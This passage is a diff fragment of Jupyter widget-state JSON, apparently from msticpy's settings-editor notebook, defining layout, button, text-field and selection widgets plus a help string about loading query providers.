+     "d3bdbda975a44b35ae58d55e23b39abc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_20558f5a47434bde9e71751de9ab8ca6",
+        "IPY_MODEL_3ada0cbd4e034ea382eaf0aef06aba0c",
+        "IPY_MODEL_3efd692b66f348a681423128f702e850"
+       ],
+       "layout": "IPY_MODEL_380f2f40adef4e2dadff1e271a42d42e"
+      }
+     },
+     "d3ce11cbadc7442cae69048f6f5b99eb": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "d59cfa544fa74d779b0adbd644158069": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "d62c56e08da342189ec2ef20acdb8389": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "d653404232ee4ed38dc9b2ea2e0f3d3b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "d7844dbb5e304f068e8390c8b9832539": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "continuous_update": false,
+       "description": "Search pattern",
+       "layout": "IPY_MODEL_6c1726aebd5744139b2224117afd4e48",
+       "style": "IPY_MODEL_681e717b03e849828894b88db5d3e3ba"
+      }
+     },
+     "d808ee0e32bc4fcc9d7c0a7608bd5a63": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "d81922d5908c4159968d962d89a2ce38": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_56f0e9d4b62d42dcb2e9c699cb332521",
+        "IPY_MODEL_654e09700c9e4747a7d7b445236701fd"
+       ],
+       "layout": "IPY_MODEL_f9c3ed33620e4c409b19a16a5e2bdf48"
+      }
+     },
+     "d8d9dc6bfa014726b51592ce7f6c6981": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "d934834d337f41689a2c190ff5dd5b0a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "d94ead5eac604dedbbfc6611fe38f53a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "d99fae102fec400bb21cfef866a24633": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "d9bd349c501e46e4ae1576492312185c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save",
+       "layout": "IPY_MODEL_e531be2f1ccc4dc2ac27761f34ccb3a6",
+       "style": "IPY_MODEL_ea20d98a14c04c5f8351b018977e835c"
+      }
+     },
+     "da2c6f312f024674a6a4c5cefa7fa327": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_50ea233d5841471a93ccb7be5837e125",
+        "IPY_MODEL_01303a36d5474434ab629f6cc4971b41"
+       ],
+       "layout": "IPY_MODEL_e7460577341143dabedf3863db77cfb3"
+      }
+     },
+     "da611108f44946e1a1273035e66fd31a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "da68216168364a19bc790c48bfe1fdba": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "dad02487175d49c7ba7d2c87d82f88b5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "db2ef4286e7d40439a69a6220f3b9513": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Providers",
+       "index": null,
+       "layout": "IPY_MODEL_535aa7be330448fca1e52a4a09538928",
+       "style": "IPY_MODEL_1f47cc55f25043a69a226733ef757755"
+      }
+     },
+     "dd459d65c4b549b49e2ee3ac7d15df93": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "75%"
+      }
+     },
+     "dd672cbb506449e9b0e059c2acd81aa0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "dd762cde710240ca9f7ce506655bdaae": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "dddbd4cc3ac14899a9a8eead61abc3f8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "View Settings",
+       "layout": "IPY_MODEL_9ae51a287b924f3db1c8e846bee3dac5",
+       "style": "IPY_MODEL_20c8382e46bb405d8293dc735e51ddaf"
+      }
+     },
+     "dec4bbb7f67646daa1249b5a38a0ca75": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "continuous_update": false,
+       "description": "Path",
+       "layout": "IPY_MODEL_e33c84164a0c4cafb5f844d57af24ea0",
+       "style": "IPY_MODEL_3940ed4c79244364ab8c161cb313ca74",
+       "value": "E:\\src\\microsoft\\msticpy\\docs\\notebooks"
+      }
+     },
+     "dede3f980cc34e47b839e2db8dcd6c3d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "dfc631cf70974714b0f73953836bf895": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "99%"
+      }
+     },
+     "e0431ced41944768943a4c066578efa2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e099e967cd11436a919d8fc069ebe610": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_50d0674861f24a309ca322b43bb6b20f",
+        "IPY_MODEL_40cec93fb0ec431db558e192ddec9f15",
+        "IPY_MODEL_815243e08d1c4aa881b07de4447b5cba"
+       ],
+       "layout": "IPY_MODEL_42e254491c0f43668cd2d2ce1ab0f967"
+      }
+     },
+     "e0cdf461489b4dd78d1a8074497f3abd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "TenantId",
+       "layout": "IPY_MODEL_307293a98db44c97848b363bc6f39f99",
+       "style": "IPY_MODEL_9384300713db413f99270bd0a5acd94c",
+       "value": "72f988bf-86f1-41af-91ab-2d7cd011db47"
+      }
+     },
+     "e0fdf577e065464795bd312639348af8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e177dd8b36024ea4821e47e39a3eaaec": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Show Key Vault secrets",
+       "layout": "IPY_MODEL_fe7906d23c6047e8bad2542ae8dbe0f0",
+       "style": "IPY_MODEL_8287dff8e3ac44f4bda3c88370a44987"
+      }
+     },
+     "e186ee9554a643f895d2b115c2fb53cd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "e19f27308e57458a9650c825151e2462": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_137b719ede3641d3a0315dad85053d78",
+        "IPY_MODEL_88e7532e8ee64e63b0618bb90ce8d8b8",
+        "IPY_MODEL_989dcbb8eed44bf0894a2cd695936353",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
+       "layout": "IPY_MODEL_ca9c2a191d8c4700883ae6bf6d10c190"
+      }
+     },
+     "e1c3854188344e2cbe4e03da02b0c737": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "98%"
+      }
+     },
+     "e23ddff0618e466883934e0d510ac18e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_8026898077a54e35b403a37f4cea98bd",
+        "IPY_MODEL_88889c6eb0754590b5b99e686bd165ba",
+        "IPY_MODEL_8d923e51ed1c410a9ce7039694d1aa85",
+        "IPY_MODEL_4ef60145dd30491383e57f9c3782f3a1"
+       ],
+       "layout": "IPY_MODEL_fb51a0af09594db4b0ed773c3b947d9d"
+      }
+     },
+     "e2f584e1d5aa45e1bf3c9a23de14b6a6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "Name",
+       "layout": "IPY_MODEL_1f2f704c99c14428a081a7d241746a6f",
+       "style": "IPY_MODEL_44877abce781493e8c8d4cd4a96ddbf5",
+       "value": "ASIHuntOMSWorkspaceV4"
+      }
+     },
+     "e33b64bd8ece4c73bfe9896d8dff5a5a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_d7844dbb5e304f068e8390c8b9832539",
+        "IPY_MODEL_9a9c3def930f47ed86ae7a146c604c2d"
+       ],
+       "layout": "IPY_MODEL_655da3aba6ca42649b5057dafd467ffd"
+      }
+     },
+     "e33c84164a0c4cafb5f844d57af24ea0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "75%"
+      }
+     },
+     "e34b57b30a8a4f6c9992f52c1dbbd6ef": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "99%"
+      }
+     },
+     "e447a25371dc4c049e024dae06d983b9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_a7ac843d471b402ea9310741bf804c63",
+        "IPY_MODEL_f7d5d6de90354134864939ca49a674cc",
+        "IPY_MODEL_035f7da3f6b2462cb5a82f5da10d18cb"
+       ],
+       "layout": "IPY_MODEL_e0fdf577e065464795bd312639348af8"
+      }
+     },
+     "e4b8e1a0671a42bfaeed971f7df99e01": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e52c8bd4809e41a0a4c874697ad1cc38": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "e531be2f1ccc4dc2ac27761f34ccb3a6": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "100px"
+      }
+     },
+     "e5daba79291f4652a8bed244ad6b3ec7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "View Settings",
+       "layout": "IPY_MODEL_7b32d76ea7a9413b84f9f8813692cf0e",
+       "style": "IPY_MODEL_944fdca6b0044cbf9378790b606e67d4"
+      }
+     },
+     "e6f6e85fc1584fd59800a70461304660": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Help"
+       },
+       "children": [
+        "IPY_MODEL_843a9515cd8046818c0ccf34f402b762"
+       ],
+       "layout": "IPY_MODEL_737ad83f14a049e692f695a1f3c7d2c9",
+       "selected_index": null
+      }
+     },
+     "e74003f6e2604c9580bf148b31317484": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "100%"
+      }
+     },
+     "e7460577341143dabedf3863db77cfb3": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "30%"
+      }
+     },
+     "e8236bbdfa57450b832c3eabe99dc561": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_b846ad25b11b43d7bc7eb1348effa55f",
+        "IPY_MODEL_a9dc7796a0f540128426e637ffc44957",
+        "IPY_MODEL_64def8e524aa48a0b980bfa5e7b6ee65",
+        "IPY_MODEL_7c6b2b0f10b042338c81539890997b96"
+       ],
+       "layout": "IPY_MODEL_0b6b065cc30247ff8dd1cb8fe9cdd1d4"
+      }
+     },
+     "e8ae1454dfa94648a2e63f3d212a9cff": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "e8c4c105db684733a78352cd4aa810af": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "e8e2b3ae6b4544c08f465707c4d0dd3d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_17dfa63ae43940568587f69f37ab8537",
+        "IPY_MODEL_6e2fcfed40664e3f994de7982b2fdf36"
+       ],
+       "layout": "IPY_MODEL_ec1bb9ad17604f9b980a1d7b1865f05c"
+      }
+     },
+     "e8eefdbb4e6e4e36aa87e19404b998c8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "e94f302ee2d74244b5651d252b74d761": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete",
+       "layout": "IPY_MODEL_369c91149ff749598a1b4f5c36e2c60b",
+       "style": "IPY_MODEL_fcb8b83a29584eac86678d4b791496fd"
+      }
+     },
+     "e99cc9e5085e4166a732d355d9f1d7c0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "e9f3df2b63fd44acb6c1bc35cd2c2b03": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_7f9d623507a2454eb8870f0de8496faf",
+        "IPY_MODEL_a51e4b7e3517423390db2fb28b870078"
+       ],
+       "layout": "IPY_MODEL_5f6b8f199d2944a7a318e256229460e9"
+      }
+     },
+     "e9fb358d8bec4613b1bab956e016b409": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ea01314cfeb94cf5833477ebb4103121": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ea20d98a14c04c5f8351b018977e835c": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "ea7f96341540490a99ad5d1794972619": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "70%"
+      }
+     },
+     "ea93c8f639114f12bc2a44a396545f66": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ebe47278b7914c74a3870ab79f18b39e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_44e87fe553044e4cba878c05ee113fc7",
+        "IPY_MODEL_72ba18e8eef14be58479f02b100b5e52"
+       ],
+       "layout": "IPY_MODEL_5fbb1854a8424957a67eee743b23d443"
+      }
+     },
+     "ec1bb9ad17604f9b980a1d7b1865f05c": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "60%"
+      }
+     },
+     "ed08345a28fa48f5a3a91147920f72c9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "layout": "IPY_MODEL_1e7d59e4b3a34e3db96a8c7999a499e8"
+      }
+     },
+     "ed454c884b7543d0ae83972fa3ad9286": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_a58374e5fff44b88be40b8442a299d39"
+       ],
+       "layout": "IPY_MODEL_0e7de0201f784d9e960416bd1de9b36c"
+      }
+     },
+     "ed45994cd94d48668c8ef7702edfacc9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ed785a11425e448eab6b98bb42f39d09": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "ed791ac19fcc479ba70c43189aadc709": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "RadioButtonsModel",
+      "state": {
+       "_options_labels": [
+        "Text",
+        "EnvironmentVar",
+        "KeyVault"
+       ],
+       "description": "Storage:",
+       "index": 2,
+       "layout": "IPY_MODEL_9e8907ea8b8d4af58c731d9bd7c675f1",
+       "style": "IPY_MODEL_8662987f97b2430e99ca8b961f5088ca"
+      }
+     },
+     "edb2671ff424439f81a37a23b88ad403": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "ef4db94a68634fd3a9c541ec49a392b9": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "ef662708cb7443749144dc336632be9e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Add",
+       "layout": "IPY_MODEL_6ea20439d77e4e6199861f8ec14ede0c",
+       "style": "IPY_MODEL_f13345bdebe34ef4a5fe420df84ce5c4"
+      }
+     },
+     "ef76e7fdf2a541f39360d7559616f2c5": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "efb1a55ac5b04399af17857941106168": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "50%"
+      }
+     },
+     "f0d6925abadf4698aae2a91a4c564663": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_44e87fe553044e4cba878c05ee113fc7",
+        "IPY_MODEL_72ba18e8eef14be58479f02b100b5e52"
+       ],
+       "layout": "IPY_MODEL_7058977d363e42779eb6539bab0c27ac"
+      }
+     },
+     "f13345bdebe34ef4a5fe420df84ce5c4": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "f19c9696ac2843b290a1b0a144a3e4f1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "100px"
+      }
+     },
+     "f23bc02d9fdb49aca1fb2cd9b09c1383": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "_options_labels": [
+        "AnomalousSequence.ipynb",
+        "AzureBlobStorage.ipynb",
+        "AzureSentinelAPIs.ipynb",
+        "Base64Unpack.ipynb",
+        "DataObfuscation.ipynb",
+        "DataUploader.ipynb",
+        "Data_Queries.ipynb",
+        "EventClustering.ipynb",
+        "EventTimeline.ipynb",
+        "FoliumMap.ipynb",
+        "GeoIPLookups.ipynb",
+        "IoCExtract.ipynb",
+        "MDATPQuery.ipynb",
+        "MordorData.ipynb",
+        "MPSettingsEditor.ipynb",
+        "msticpyconfig.yaml",
+        "MSTICpy_Blackhat_Demo_2020.ipynb",
+        "NotebookWidgets.ipynb",
+        "PivotFunctions-Introduction.ipynb",
+        "PivotFunctions.ipynb",
+        "ProcessTree.ipynb",
+        "Splunk-DataConnector.ipynb",
+        "SqlToKql.ipynb",
+        "TimeSeriesAnomaliesVisualization.ipynb",
+        "TIProviders.ipynb",
+        "VirusTotalLookup.ipynb",
+        "VTLookupV3.ipynb"
+       ],
+       "description": "Files",
+       "index": 0,
+       "layout": "IPY_MODEL_0b167cb8b1e54dd7ad6bce060c148e10",
+       "style": "IPY_MODEL_7685bbbb84834f3980a1224a1a434117"
+      }
+     },
+     "f2d7f1d46f9142379aaaa6466e4e4060": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": ""
+      }
+     },
+     "f324995d185a4f1ebcd75c08a53474c9": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "f3365d5763fc41b0915210a50acd9044": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "f342a3f34e144f42bdb50c6b40d4eea8": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "f3b2451c012c4cd98d8494d0c9f14ef7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "SelectModel",
+      "state": {
+       "description": "Results",
+       "index": null,
+       "layout": "IPY_MODEL_a75442a8dc0447f0b65e8cec07981f61",
+       "style": "IPY_MODEL_99da7cc9456543fa91de0017af4ced7f"
+      }
+     },
+     "f3ddf795738345aba2d3e51a7d6a698a": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_ed454c884b7543d0ae83972fa3ad9286",
+        "IPY_MODEL_0bd2627f17fe4aee808e88be607d6c77"
+       ],
+       "layout": "IPY_MODEL_854fe1fa9f5e4f09a9cc4b20c7983c99"
+      }
+     },
+     "f3f43f2784664a2ca5759bc9641aac0a": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "f464498bf03d4aeda263af1d4a744b2e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_278253aa0ed24da7bb318bb1838aecf9",
+        "IPY_MODEL_4698673c4710455ea3d8e9924833c03a",
+        "IPY_MODEL_124998e4066b40bd997e74a960926e1a",
+        "IPY_MODEL_75f713decd474fbfad61635108533541"
+       ],
+       "layout": "IPY_MODEL_2575e5825f654cc98849dc18d3da66e3"
+      }
+     },
+     "f5b1f696cb794fb1afd1ea2a87283524": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "40%"
+      }
+     },
+     "f63b51d320a044af86f45d8120a0289d": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HTMLModel",
+      "state": {
+       "layout": "IPY_MODEL_1ab85202d43e4c54b7ee23175398ae44",
+       "style": "IPY_MODEL_f2d7f1d46f9142379aaaa6466e4e4060",
+       "value": "\n    Choose the query providers to load when you run nbinit.init_notebook().<br>\n\n    There are two classes of providers - AzureSentinel workspaces and other\n    providers.\n    In the former case you must specify a workspace to load (by default it is\n    the \"Default\" workspace).\n    Other providers typically only have a single profile so there is no analgous\n    setting<br><br>\n\n    Query providers have two optional parameters:\n    <ul>\n        <li><b>alias</b> - upon loading, msticpy will create a variable based on\n        this alias, prefixed with \"qry_\". E.g. if you set alias=\"local\" a variable\n        named \"qry_local\" is created in the Python/Jupyter namespace. You can use\n        this variable to execute queries for this provider.\n        </li>\n        <li><b>connect</b> - the default behavior is to connect/authenticate\n        this provider after loading it. Set this to False if you do not want\n        to authenticate immediately.\n        </li>\n    </ul>\n    <br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html#user-defaults' target='_blank' style='color: blue; text-decoration: underline;'>Online: User Defaults</a><br><a href='https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#autoload-query-providers' target='_blank' style='color: blue; text-decoration: underline;'>Online: Help on this tab</a>"
+      }
+     },
+     "f65ca0d67bea49cc861564ae02c65c6f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save",
+       "layout": "IPY_MODEL_03bb844dadea436e86b4d3fb95277aeb",
+       "style": "IPY_MODEL_16b8d8f0f6344b5c90320016e5bef273"
+      }
+     },
+     "f6cb8833183b4b97addd91721106fc59": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_4be543ec69a741ca9ebc9f2b70b7ac2b",
+        "IPY_MODEL_2a8595894d4d4238b870627c2b05f798"
+       ],
+       "layout": "IPY_MODEL_974242b730374bfab9aa4209638b1aa7"
+      }
+     },
+     "f7392e3958044faa8d92caa5f2e70fc4": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "30%"
+      }
+     },
+     "f786dd070bc4492b8cd3bc422d8797b7": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "f7894c4c51c04535990ee02a6c4bfc6e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_b3f87df3253e450facc04e76a86b8ebf",
+        "IPY_MODEL_c3eada2a8e8e4685835224b6156557b8"
+       ],
+       "layout": "IPY_MODEL_97c3e2f44f5948728157391d78250b75"
+      }
+     },
+     "f7d5d6de90354134864939ca49a674cc": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_47b5829b00554d7091d2208977712a50",
+        "IPY_MODEL_0c7aca941dcc466989608a358cb4b5b6"
+       ],
+       "layout": "IPY_MODEL_2e80a44a83fa433abaaf608cca409118"
+      }
+     },
+     "f8301f17c83744e285131a932f17ac93": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "f8d1e11d60ab48d190c4fcec7eeabbcf": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "f930285c8b734951bd10cd87d0911432": {
